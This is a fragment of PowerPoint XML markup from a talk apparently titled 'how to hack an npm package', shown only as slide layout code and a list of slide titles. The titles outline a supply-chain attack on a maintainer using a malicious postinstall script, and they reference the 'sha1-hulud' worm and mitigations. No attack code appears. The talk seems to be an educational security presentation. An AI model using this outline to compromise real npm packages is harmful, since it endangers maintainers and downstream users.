            <a:ext cx="4380288" cy="2545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061499-B1BE-1EFB-3F2C-F28362ECB4A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2014327"/>
            <a:ext cx="316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september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9th</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="105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0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2D4371-2C20-BF64-FEDE-FB3B0805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3243B-0F5A-487F-85B6-B8FBD50F0894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4970932" y="507624"/>
            <a:ext cx="2250134" cy="1246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░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░ ░▒▓██████▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓██████████████▓▒░ ░▒▓███████▓▒░ ░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓████████▓▒░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░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░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░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓████████▓▒░▒▓█▓▒░ ░▒▓███████▓▒░ ░▒▓████████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒▒▓███▓▒░▒▓██████▓▒░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35EE6D-D5D0-B0DF-4F79-8CCCA6DBB15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="882948"/>
            <a:ext cx="9144000" cy="113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57561-A86B-C29D-3583-B10C3370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9" y="1062558"/>
            <a:ext cx="5839287" cy="247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304089-7537-C955-ACB5-1292B503A8B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398992" y="508265"/>
            <a:ext cx="53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sha1-hulud worm round 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="105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75DF3-91C1-3E2F-CE3F-D70B6053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20" y="4403523"/>
            <a:ext cx="5613400" cy="119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D4160E-1DC0-E232-41C9-C2A59FD85018}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5782491" y="3860993"/>
            <a:ext cx="488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sha1-hulud worm round 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="105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8c46db8-a320-4d36-b985-8e83b9a31535}" enabled="1" method="Privileged" siteId="{b753ccc3-ebed-44f1-a314-4d5fc6a6fdc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19111</TotalTime>
  <Words>4017</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>527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Courier New</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>how to hack an npm package</vt:lpstr>
      <vt:lpstr>&gt; disclaimer</vt:lpstr>
      <vt:lpstr>npm </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>&gt; open source</vt:lpstr>
      <vt:lpstr>&gt; open source</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>&gt; the scenario</vt:lpstr>
      <vt:lpstr> &gt; the plan</vt:lpstr>
      <vt:lpstr>&gt; research</vt:lpstr>
      <vt:lpstr>&gt; find the target</vt:lpstr>
      <vt:lpstr>&gt; find the target</vt:lpstr>
      <vt:lpstr>&gt; find the target</vt:lpstr>
      <vt:lpstr>the maintainer</vt:lpstr>
      <vt:lpstr>&gt; the hack</vt:lpstr>
      <vt:lpstr>&gt;&gt; choose your poison</vt:lpstr>
      <vt:lpstr>&gt;&gt; choose your poison</vt:lpstr>
      <vt:lpstr>&gt;&gt; the v.i.p. treatment</vt:lpstr>
      <vt:lpstr>&gt;&gt; gained access!</vt:lpstr>
      <vt:lpstr>&gt;&gt; malicious script flow </vt:lpstr>
      <vt:lpstr>&gt;&gt;&gt; npm lifecycle scripts</vt:lpstr>
      <vt:lpstr>&gt;&gt;&gt; the malicious script </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>&gt;&gt;&gt;&gt; embedding the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&gt;&gt;&gt;&gt; post install script</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>&gt;&gt; release</vt:lpstr>
      <vt:lpstr>&gt;&gt; release</vt:lpstr>
      <vt:lpstr>&gt;&gt; release</vt:lpstr>
      <vt:lpstr>&gt;&gt;&gt; why multiple versions?</vt:lpstr>
      <vt:lpstr>&gt;&gt;&gt; why multiple versions?</vt:lpstr>
      <vt:lpstr>&gt; now we wait…</vt:lpstr>
      <vt:lpstr>&gt; now we wait…</vt:lpstr>
      <vt:lpstr>&gt; release the series!</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>&gt; ai  </vt:lpstr>
      <vt:lpstr>&gt; mitigation  </vt:lpstr>
      <vt:lpstr>&gt; mitigation  </vt:lpstr>
      <vt:lpstr>&gt; mitigation  </vt:lpstr>
      <vt:lpstr>&gt; mitigation  </vt:lpstr>
      <vt:lpstr>thanks for listening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Louie Colgan</dc:creator>
  <cp:lastModifiedBy>Louie Colgan</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-16T20:25:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-25T19:33:59Z</dcterms:modified>
</cp:coreProperties>
</file>